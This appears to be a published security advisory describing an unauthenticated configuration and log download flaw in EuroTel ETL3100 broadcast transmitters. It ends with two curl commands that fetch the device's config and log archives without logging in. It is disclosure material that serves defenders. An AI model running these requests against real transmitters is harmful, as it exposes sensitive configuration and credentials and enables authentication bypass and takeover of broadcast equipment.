EuroTel ETL3100 Transmitter Information Disclosure

`  
EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability  
  
Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L  
Product web page: https://www.eurotel.it | https://www.siel.fm  
Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)   
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)  
  
  
Summary: RF Technology For Television Broadcasting Applications.  
The Series ETL3100 Radio Transmitter provides all the necessary  
features defined by the FM and DAB standards. Two bands are provided  
to easily complain with analog and digital DAB standard. The Series  
ETL3100 Television Transmitter provides all the necessary features  
defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as  
well as the analog TV standards. Three band are provided to easily  
complain with all standard channels, and switch softly from analog-TV  
'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.  
  
Desc: The TV and FM transmitter suffers from an unauthenticated  
configuration and log download vulnerability. This will enable  
the attacker to disclose sensitive information and help him in  
authentication bypass, privilege escalation and full system access.  
  
Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2023-5784  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php  
  
  
29.04.2023  
  
--  
  
  
$ curl http://192.168.2.166/cfg_download.php -o config.tgz  
$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz  
`